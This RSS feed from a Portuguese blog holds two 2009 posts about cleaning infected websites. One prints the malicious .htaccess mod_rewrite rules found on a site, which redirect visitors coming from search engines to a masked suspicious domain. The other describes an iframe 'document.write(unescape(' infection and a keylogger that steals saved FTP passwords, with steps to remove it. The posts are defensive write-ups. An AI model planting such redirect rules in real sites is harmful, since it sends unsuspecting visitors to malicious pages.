<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Fodi.me MEO Passwords &#187; virus</title>
	<atom:link href="http://fodi.me/tag/virus/feed/" rel="self" type="application/rss+xml" />
	<link>http://fodi.me</link>
	<description>dlink and meo passwords</description>
	<lastBuildDate>Mon, 21 May 2012 19:38:15 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.2</generator>
		<item>
		<title>Virus em ficheiros .htaccess</title>
		<link>http://fodi.me/virus-em-ficheiros-htaccess/</link>
		<comments>http://fodi.me/virus-em-ficheiros-htaccess/#comments</comments>
		<pubDate>Wed, 01 Apr 2009 20:26:14 +0000</pubDate>
		<dc:creator>OBH</dc:creator>
				<category><![CDATA[virus]]></category>

		<guid isPermaLink="false">http://fodi.me/?p=254</guid>
		<description><![CDATA[Com algum espanto hoje verifiquei que um site que fiz tinha virus, corri e percorri o codigo todo sem encontrar nada em concreto, até que ao fim de umas horas decidi começar a verificar ficheiro por ficheiro em cada pasta incluindo o .htaccess onde verifiquei que tinha ficheiros .htaccess com o texto que segue mais [...]]]></description>
			<content:encoded><![CDATA[<p>Com algum espanto hoje verifiquei que um site que fiz tinha virus, corri e percorri o codigo todo sem encontrar nada em concreto, até que ao fim de umas horas decidi começar a verificar ficheiro por ficheiro em cada pasta incluindo o <strong>.htaccess</strong> onde verifiquei que tinha ficheiros .htaccess com o texto que segue mais abaixo.</p>
<p><a href="http://fodi.me/wp-content/uploads/2009/04/mod_rewrite_ascii.png"><img class="size-full wp-image-255" title="Virus utiliza o mod_rewrite infectando htaccess " src="http://fodi.me/wp-content/uploads/2009/04/mod_rewrite_ascii.png" alt="Virus utiliza o mod_rewrite infectando htaccess " width="639" height="139" /></a></p>
<p>É claro que eu ao visitar o site nunca iria ver o virus, pois o <strong>.htaccess</strong> faz uso do <span style="text-decoration: underline;">mod_rewrite</span> do apache para redireccionar os visitantes que chegam ao nosso site a partir dos motores de busca para sites &#8220;suspeitos&#8221;.<br />
<span id="more-254"></span></p>
<blockquote><p>RewriteEngine On<br />
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]<br />
RewriteRule .* http://xxxxxx-xxxxxxx.xxxx [R,L]</p></blockquote>
<p>A remoção do virus é basntante simples e passa tambem pelo que já expliquei no virus iframe como lhe chamei, passa pela limpeza do computador que no meu caso está &#8220;limpo&#8221; julgo eu <img src='http://fodi.me/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' />  e pela alteração de passwords ftp.</p>
]]></content:encoded>
			<wfw:commentRss>http://fodi.me/virus-em-ficheiros-htaccess/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Ataque IFRAME document.write(unescape( virus</title>
		<link>http://fodi.me/ataque-iframe-documentwrite-unescape/</link>
		<comments>http://fodi.me/ataque-iframe-documentwrite-unescape/#comments</comments>
		<pubDate>Wed, 11 Mar 2009 15:57:12 +0000</pubDate>
		<dc:creator>OBH</dc:creator>
				<category><![CDATA[Segurança]]></category>
		<category><![CDATA[virus]]></category>

		<guid isPermaLink="false">http://fodi.me/?p=139</guid>
		<description><![CDATA[Chegou-me à pouco tempo às mão a tarefa de eliminar um virus num website feito em Joomla esse virus infecta todos os index&#8217;s html&#8217;s e php&#8217;s existentes na conta de alojamento. Na altura pensei que fosse um problema de segurança no Joomla, protegendo as configurações do servidor ao máximo para que o mesmo não volta-se [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://fodi.me/wp-content/uploads/2009/03/virus-ch2.jpg"><img class="size-thumbnail wp-image-140 alignleft" title="virus-ch2" src="http://fodi.me/wp-content/uploads/2009/03/virus-ch2-150x148.jpg" alt="virus-ch2" width="150" height="148" /></a>Chegou-me à pouco tempo às mão a tarefa de eliminar um virus num website feito em Joomla esse virus infecta todos os index&#8217;s html&#8217;s e php&#8217;s existentes na conta de alojamento.</p>
<p>Na altura pensei que fosse um problema de segurança no Joomla, protegendo as configurações do servidor ao máximo para que o mesmo não volta-se a suceder.</p>
<p>O que se passou é que o virus voltou passados 5 ou 6 dias, dei voltas e voltas e apenas cheguei à conclusão que só podia ser atravez de FTP, uma vez que os logs do apache estavam limpos na hora e data de modificação dos ficheiros.</p>
<h3><strong>Como Eliminar?</strong></h3>
<p><span id="more-139"></span></p>
<p>Passo a explicar mais ou menos a forma de funcionamento do virus.<br />
Ao visitar um site que esteja infectado o virus tenta instalar-se no computador do visitante instalando no mesmo um <strong>keylogger</strong> que irá fazer um scan às <strong>passwords FTP</strong> gravadas no PC.<br />
<strong>1º</strong> Portanto a maneira de eliminar o vírus passa primeiro por limpar o PC de qualquer vírus existente com um antivírus, ou até em ultimo recurso formatar o computador.</p>
<p><strong>2º</strong> Após o computador limpo eliminar todos os vírus existentes nos html&#8217;s e php&#8217;s, procurando nos documentos por &#8220;document.write(unescape(&#8221;</p>
<p><strong>3º</strong> Mudar todas as passwords FTP, usando para o efeito tb passwords com maiusculas minusculas um numero e se possivel um caracter especial</p>
<p>Trata-se de um virus que está a propagar-se bastante podendo o mesmo originar falhas de segurança nos servidores caso começe a instalar codigo malicioso tipo backdoors.</p>
]]></content:encoded>
			<wfw:commentRss>http://fodi.me/ataque-iframe-documentwrite-unescape/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>

